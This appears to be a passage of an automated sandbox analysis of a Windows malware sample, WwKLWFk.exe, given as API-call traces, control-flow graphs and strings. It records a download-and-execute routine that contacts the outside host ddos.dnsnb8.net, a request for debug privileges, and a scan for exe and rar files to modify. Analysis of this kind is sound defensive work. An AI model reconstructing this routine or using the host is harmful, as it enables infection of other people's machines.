                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0021224A
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122C6
                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122CB
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122DD
                                    • WriteFile.KERNEL32(000000FF,00214008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122F7
                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0021230D
                                    • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00212322
                                    • UnmapViewOfFile.KERNEL32(?,?,002132B0,00000164,00212986,?), ref: 00212340
                                    • FindCloseChangeNotification.KERNEL32(?,?,002132B0,00000164,00212986,?), ref: 0021234E
                                    • FindCloseChangeNotification.KERNEL32(000000FF,?,002132B0,00000164,00212986,?), ref: 00212359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$ChangeCloseFindNotificationView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                    • String ID: .@!$5@!$<@!$C@!$m@!
                                    • API String ID: 386175886-1914238424
                                    • Opcode ID: d0677529d8aa6787c492c7cf550bf9e0b5f96877745863a5f90d376175a0ca1f
                                    • Instruction ID: 3d6d19a161a0208b637c0a0967ff36626d69119ace0bd4a761226156ea128cdf
                                    • Opcode Fuzzy Hash: d0677529d8aa6787c492c7cf550bf9e0b5f96877745863a5f90d376175a0ca1f
                                    • Instruction Fuzzy Hash: 25F13571910209EFCB20DFA4D884AEDBBF5FF28314F10852AE519A7661D730AEA5CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 117 211973-21199a PathFileExistsA 118 2119a0-2119aa 117->118 119 211ac7-211acc 117->119 120 2119af-2119c2 CreateFileA 118->120 121 211ad0-211ad5 119->121 122 211ace 119->122 123 2119c4-2119d3 Sleep 120->123 124 211a28-211a36 GetFileSize 120->124 125 211af0-211af6 121->125 126 211ad7-211ad9 121->126 122->121 123->120 127 2119d5-211a0b call 21185b wsprintfA CopyFileA 123->127 128 211a87-211a8b 124->128 129 211a38-211a3b 124->129 126->125 127->124 141 211a0d-211a26 CreateFileA 127->141 130 211a96-211a9a 128->130 131 211a8d-211a90 FindCloseChangeNotification 128->131 129->128 133 211a3d-211a51 VirtualAlloc 129->133 134 211aad-211ab1 130->134 135 211a9c 130->135 131->130 133->128 137 211a53-211a57 133->137 139 211ab3-211ab6 134->139 140 211adb-211ae0 134->140 138 211aa0-211aa7 DeleteFileA 135->138 142 211a80 137->142 143 211a59-211a6d ReadFile 137->143 138->134 139->119 144 211ab8-211ac1 VirtualFree 139->144 146 211ae2-211ae5 140->146 147 211ae7-211aec 140->147 141->124 145 211a9e 141->145 142->128 143->128 148 211a6f-211a7e 143->148 144->119 145->138 146->147 147->125 149 211aee 147->149 148->142 148->143 149->125
                                    APIs
                                    • PathFileExistsA.SHLWAPI(\N!`N!,00000000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211992
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002119BA
                                    • Sleep.KERNEL32(00000064), ref: 002119C6
                                    • wsprintfA.USER32 ref: 002119EC
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00211A00
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00211A1E
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00211A2C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00211A46
                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00211A65
                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00211A90
                                    • DeleteFileA.KERNEL32(?), ref: 00211AA7
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00211AC1
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 0021197C
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 002119DB
                                    • \N!`N!, xrefs: 00211980
                                    • %s%.8X.data, xrefs: 002119E6
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                    • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$\N!`N!
                                    • API String ID: 2523042076-3475033246
                                    • Opcode ID: 222b2a97c017c6ea3a0c679baacd86a288fbd4d9bf09c6f24fc1d635f9f5f777
                                    • Instruction ID: efec82e25891e7701b4cd7022192df0cd89c6b1928a7fc2116c0363332c1e173
                                    • Opcode Fuzzy Hash: 222b2a97c017c6ea3a0c679baacd86a288fbd4d9bf09c6f24fc1d635f9f5f777
                                    • Instruction Fuzzy Hash: 14515C7191121AAFCF10DF98DC88AEEBFF9EF29354F104569F615A2190D7709EA0CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 150 2128b8-2128ff memset wsprintfA 151 212905-21290d 150->151 152 2129db-2129df 150->152 151->152 153 212913-212919 151->153 154 212956-212965 strrchr 153->154 155 21291b-21294c memset wsprintfA call 2129e2 153->155 154->152 157 212967-212978 lstrcmpiA 154->157 158 212951 155->158 159 212988-212992 lstrcmpiA 157->159 160 21297a-212981 call 211e6e 157->160 158->152 159->152 162 212994-21299b 159->162 163 212986 160->163 164 2129ad-2129c9 strstr 162->164 165 21299d-2129a3 162->165 163->152 167 2129d3-2129d6 call 212692 164->167 168 2129cb-2129d1 call 21239d 164->168 165->164 166 2129a5-2129a7 lstrcpy 165->166 166->164 167->152 168->152
                                    APIs
                                    • memset.MSVCRT ref: 002128D3
                                    • wsprintfA.USER32 ref: 002128F7
                                    • memset.MSVCRT ref: 00212925
                                    • wsprintfA.USER32 ref: 00212940
                                      • Part of subcall function 002129E2: memset.MSVCRT ref: 00212A02
                                      • Part of subcall function 002129E2: wsprintfA.USER32 ref: 00212A1A
                                      • Part of subcall function 002129E2: memset.MSVCRT ref: 00212A44
                                      • Part of subcall function 002129E2: lstrlen.KERNEL32(?), ref: 00212A54
                                      • Part of subcall function 002129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00212A6C
                                      • Part of subcall function 002129E2: strrchr.MSVCRT ref: 00212A7C
                                      • Part of subcall function 002129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00212A9F
                                      • Part of subcall function 002129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00212AAE
                                      • Part of subcall function 002129E2: memset.MSVCRT ref: 00212AC6
                                      • Part of subcall function 002129E2: memset.MSVCRT ref: 00212ADA
                                      • Part of subcall function 002129E2: FindFirstFileA.KERNEL32(?,?), ref: 00212AEF
                                      • Part of subcall function 002129E2: memset.MSVCRT ref: 00212B13
                                    • strrchr.MSVCRT ref: 00212959
                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00212974
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                    • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                    • API String ID: 3004273771-1101464738
                                    • Opcode ID: daba20b8defdf30f5b4492d0717ef2b43b93e65a556f913f177b58c1fe5d391f
                                    • Instruction ID: 9bd34a89fa16f1f94418b06895a86d309ff68ce5411851e1589e0ff0a63c2210
                                    • Opcode Fuzzy Hash: daba20b8defdf30f5b4492d0717ef2b43b93e65a556f913f177b58c1fe5d391f
                                    • Instruction Fuzzy Hash: E331A97195031DBBDB20EB68DC89FDA77DDDF35310F140452F545A2081EAB5AAF88BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 172 211099-2110b4 173 211199-21119c 172->173 174 2110ba-2110c7 172->174 175 2110c8-2110d4 174->175 176 211184-211190 175->176 177 2110da 175->177 176->175 178 211196-211198 176->178 179 211113-211162 call 21185b wsprintfA * 2 URLDownloadToFileA 177->179 178->173 182 211168-211182 lstrlen Sleep 179->182 183 2110dc-21110d call 211000 WinExec lstrlen 179->183 182->176 182->179 183->178 183->179
                                    APIs
                                      • Part of subcall function 0021185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
                                      • Part of subcall function 0021185B: srand.MSVCRT ref: 00211878
                                      • Part of subcall function 0021185B: rand.MSVCRT ref: 00211880
                                      • Part of subcall function 0021185B: srand.MSVCRT ref: 00211890
                                      • Part of subcall function 0021185B: rand.MSVCRT ref: 00211894
                                    • WinExec.KERNEL32(?,00000005), ref: 002110F1
                                    • lstrlen.KERNEL32(00214748), ref: 002110FA
                                    • wsprintfA.USER32 ref: 0021112A
                                    • wsprintfA.USER32 ref: 00211143
                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0021115B
                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00211169
                                    • Sleep.KERNEL32 ref: 00211179
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                    • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG!$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1280626985-1854692352
                                    • Opcode ID: 5d9d9e483675ae9376c174f362af9dfb5dc9a8b6a5fb0e18891c928a110d5407
                                    • Instruction ID: ff4b7c3ac1cb27c5eda504b26a4521f3431abbf1105f8da4c2c56ad56ab62aeb
                                    • Opcode Fuzzy Hash: 5d9d9e483675ae9376c174f362af9dfb5dc9a8b6a5fb0e18891c928a110d5407
                                    • Instruction Fuzzy Hash: E0218375910249BADB10EBA0EC48FEFBBFDAB25315F118055E608A2050DB745BE4CF50

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0021164F
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0021165B
                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00000104), ref: 0021166E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 002116AC
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 002116BD
                                      • Part of subcall function 0021139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 002113BC
                                      • Part of subcall function 0021139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002113DA
                                      • Part of subcall function 0021139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00211448
                                    • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 002116E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$C:\Windows\system32$Documents and Settings
                                    • API String ID: 123563730-3214399340
                                    • Opcode ID: 5a8d45c7f216d6fde45488f69ed5fd465ed882781ab7f8ba3e695a2692a771fc
                                    • Instruction ID: cd784e8eaff95f3e3e2792746ba282bba359bc5403407d057bea3c0c6159ac08
                                    • Opcode Fuzzy Hash: 5a8d45c7f216d6fde45488f69ed5fd465ed882781ab7f8ba3e695a2692a771fc
                                    • Instruction Fuzzy Hash: 7B11A271520114BBCF20ABA1BD4DEDB7EEEAB3A361F004025F30D911A0CA7145F0CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 205 211000-211023 CreateFileA 206 211092-211096 205->206 207 211025-211055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 211057-21105f 207->208 209 21107b-211085 207->209 210 211061-21106e call 2117d0 208->210 211 211074-211075 UnmapViewOfFile 208->211 212 211087-21108b CloseHandle 209->212 213 21108d-211091 CloseHandle 209->213 210->211 211->209 212->213 213->206
                                    APIs
                                    • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG!,http://%s:%d/%s/%s,002110E8,?), ref: 00211018
                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400), ref: 00211029
                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00211038
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0021104B
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00211075
                                    • CloseHandle.KERNEL32(?), ref: 0021108B
                                    • CloseHandle.KERNEL32(00000000), ref: 0021108E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                    • String ID: HG!$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1223616889-3941796639
                                    • Opcode ID: 9278547b04aa2a439a734306a928764e5896c467eee62fbf9f19b32d7802d1fd
                                    • Instruction ID: 81846700929904d13821e5b9ae0629d5900ba2b5c3023357bca204206c41a888
                                    • Opcode Fuzzy Hash: 9278547b04aa2a439a734306a928764e5896c467eee62fbf9f19b32d7802d1fd
                                    • Instruction Fuzzy Hash: FC01C47150024DBFE7309F60AC8CEABBBEDDB587A9F004529F744A2090DA705E948B60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 375 212c48-212c75 memset call 211973 378 212cb2-212cb9 375->378 379 212c77-212c7f 375->379 382 212cc8-212ccc 378->382 383 212cbb-212cc2 VirtualFree 378->383 380 212c81-212c8b 379->380 381 212c8f-212cac CreateThread WaitForMultipleObjects 379->381 380->381 381->378 383->382
                                    APIs
                                    • memset.MSVCRT ref: 00212C57
                                      • Part of subcall function 00211973: PathFileExistsA.SHLWAPI(\N!`N!,00000000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211992
                                      • Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002119BA
                                      • Part of subcall function 00211973: Sleep.KERNEL32(00000064), ref: 002119C6
                                      • Part of subcall function 00211973: wsprintfA.USER32 ref: 002119EC
                                      • Part of subcall function 00211973: CopyFileA.KERNEL32(?,?,00000000), ref: 00211A00
                                      • Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00211A1E
                                      • Part of subcall function 00211973: GetFileSize.KERNEL32(?,00000000), ref: 00211A2C
                                      • Part of subcall function 00211973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00211A46
                                      • Part of subcall function 00211973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00211A65
                                    • CreateThread.KERNEL32(00000000,00000000,00212B8C,00000000,00000000,00000000), ref: 00212C99
                                    • WaitForMultipleObjects.KERNEL32(00000001,002116BA,00000001,000000FF,?,002116BA,00000000), ref: 00212CAC
                                    • VirtualFree.KERNEL32(00DE0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00214E5C,00214E60,?,002116BA,00000000), ref: 00212CC2
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00212C69
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                    • API String ID: 2042498389-2197398117
                                    • Opcode ID: f2e6d2c66711ad131a3018756190bf87b967147ccded4b9da73f3567761caebb
                                    • Instruction ID: e17a590aa43c4bc2848c4ff3d9cd0609f50bc26478b35496b8e22311d97164d0
                                    • Opcode Fuzzy Hash: f2e6d2c66711ad131a3018756190bf87b967147ccded4b9da73f3567761caebb
                                    • Instruction Fuzzy Hash: F7018471651224BBD710EB95AC0EEDF7EEDEF25B60F108121F609DA1C1D9A09AB4C7E0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 384 2114e1-2114fb 385 211541-211547 384->385 386 2114fd-211510 GetModuleHandleA 384->386 389 211573-211574 call 211638 385->389 390 211549-21154c 385->390 387 211512-211518 386->387 388 21151a-211535 VirtualQuery 386->388 387->385 391 211537-211539 388->391 392 21153b 388->392 397 211579-21157a ExitProcess 389->397 393 211569-211570 390->393 394 21154e-211555 390->394 391->385 391->392 392->385 394->393 396 211557-211566 call 211af9 394->396 396->393
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00211504
                                    • VirtualQuery.KERNEL32(002114E1,?,0000001C), ref: 00211525
                                    • ExitProcess.KERNEL32 ref: 0021157A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 3946701194-0
                                    • Opcode ID: 656d6ffe21ab56daf764283001fb6acd408428d0a7d562a642895108b64fd29a
                                    • Instruction ID: a8457e6aebf068d545291094c8d5bc8016ab4687b407b4ed0e07fd33ff5aa101
                                    • Opcode Fuzzy Hash: 656d6ffe21ab56daf764283001fb6acd408428d0a7d562a642895108b64fd29a
                                    • Instruction Fuzzy Hash: 60117371911206EFCF10EF65B8896FD77FDEBB4B10B50803AF506D2150EA7489A1DB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 400 211915-211922 401 211924-211926 400->401 402 211928-21192c 400->402 403 21196e-211970 401->403 404 21194f-211952 402->404 405 21192e-21194d memset GetFileTime 402->405 404->403 407 211954-211960 SetFileTime 404->407 406 211966-211968 405->406 408 21196a 406->408 409 21196c 406->409 407->406 408->409 409->403
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: FileTimememset
                                    • String ID:
                                    • API String ID: 176422537-0
                                    • Opcode ID: e16d8ee415c0d681190f9ea7ba681671fd56e576b53a20ff3c162e358faa5923
                                    • Instruction ID: 2de6cf332439301a2aede0e87f8bf42455357ded5d5e0a16f6a497b9d7ac89dd
                                    • Opcode Fuzzy Hash: e16d8ee415c0d681190f9ea7ba681671fd56e576b53a20ff3c162e358faa5923
                                    • Instruction Fuzzy Hash: DCF04432210209ABDB20DE26DC04AE777EDAB64361F008536F626D5050E770D6A9CBE0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 410 216158-216189 VirtualFree 411 21618c-216192 410->411 412 2160c7-2160cf 411->412 413 216198-2161b0 VirtualFree 411->413 412->411 416 2160d5-2160f8 VirtualAlloc 412->416 414 2161b2-2161b4 413->414 415 2161ba-2161c8 413->415 414->415 417 216243-216251 415->417 418 2161ca-2161d7 415->418 433 2160fa-2160fc call 2166c8 416->433 434 2160fe-216106 416->434 420 216253 417->420 421 216264-21626f 417->421 422 2161dd-2161e0 418->422 425 216255-216258 420->425 426 216271-216276 421->426 422->417 427 2161e2-2161f2 422->427 425->421 429 21625a-216262 425->429 430 216389-2163b1 VirtualProtect 426->430 431 21627c-216289 426->431 432 2161f5-2161fe 427->432 429->425 437 2163b7-2163ba 430->437 452 216292-216298 431->452 453 21628b 431->453 435 216200-216203 432->435 436 21620c-216219 432->436 433->434 439 216155-216189 VirtualFree 434->439 440 216108-21611d 434->440 442 216205-216208 435->442 443 21621b-216228 435->443 444 216238-21623f 436->444 445 2163fc-2163ff VirtualProtect 437->445 446 2163bc-2163c2 437->446 439->411 450 21611f-216121 440->450 454 21622a-216236 442->454 455 21620a 442->455 443->444 444->432 449 216241 444->449 451 216400-216416 445->451 446->446 447 2163c4 446->447 447->445 456 2163c6-2163cf 447->456 449->422 457 216151-216154 450->457 458 216123 450->458 459 216420-216425 451->459 460 216418-21641d 451->460 461 2162a2-2162ac 452->461 453->452 454->444 455->444 462 2163d1 456->462 463 2163d4-2163d8 456->463 457->439 458->457 464 216125-216128 458->464 465 2162b1-2162c8 461->465 466 2162ae 461->466 462->463 469 2163da 463->469 470 2163dd-2163e1 463->470 471 216134-21613b 464->471 472 21612a-21612e 464->472 467 216373-216384 465->467 468 2162ce-2162d4 465->468 466->465 467->426 473 2162d6-2162d9 468->473 474 2162da-2162f1 468->474 469->470 475 2163e3 470->475 476 2163e7-2163fa VirtualProtect 470->476 479 216130-216132 471->479 480 21613d-21614f 471->480 472->471 472->479 473->474 482 2162f3-2162f9 474->482 483 216365-21636e 474->483 475->476 476->437 476->445 479->450 480->450 484 216314-216326 482->484 485 2162fb-21630f 482->485 483->461 487 216328-21634a 484->487 488 21634c-216360 484->488 486 216426-2164a9 485->486 497 216519-21651c 486->497 498 2164ab-2164c0 486->498 487->483 488->486 499 216583-216587 497->499 500 21651d-21651e 497->500 504 2164c2 498->504 505 216535-216537 498->505 502 216588-21658b 499->502 503 216522-216533 500->503 506 2165a1-2165a3 502->506 507 21658d-21658f 502->507 503->505 510 2164c5-2164cd 504->510 511 2164f8 504->511 508 216539 505->508 509 21659a 505->509 514 216591-216593 507->514 515 2165b4 508->515 516 21653b-216541 508->516 517 21659b-21659d 509->517 518 216542-216545 510->518 519 2164cf-2164d4 510->519 512 2164fa-2164fe 511->512 513 21656c-21656f 511->513 525 216500 512->525 526 216572 512->526 513->526 514->517 527 216595 514->527 524 2165be-216608 515->524 516->518 517->514 520 21659f 517->520 521 21654d-216550 518->521 522 216517-216518 519->522 523 2164d6-2164d9 519->523 520->502 521->524 528 216552-216556 521->528 522->497 523->521 529 2164db-2164f5 523->529 525->503 530 216502 525->530 531 216573-216576 526->531 527->509 533 216578-21657f 528->533 534 216558-216569 528->534 529->511 530->531 535 216504-216513 530->535 531->533 533->499 534->513 535->505 537 216515 535->537 537->522
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002160DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00216189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002161A5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                    • Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID:
                                    • API String ID: 1852963964-0
                                    • Opcode ID: 4f474c2830d898a7a13ef7e6ef30ff926e56764d45d9af6bbc426a0c8e11d7c7
                                    • Instruction ID: cc5ded2649cad0f45c84c2d93aaa2fa08e78da1975e722df00b1a2d016df90f8
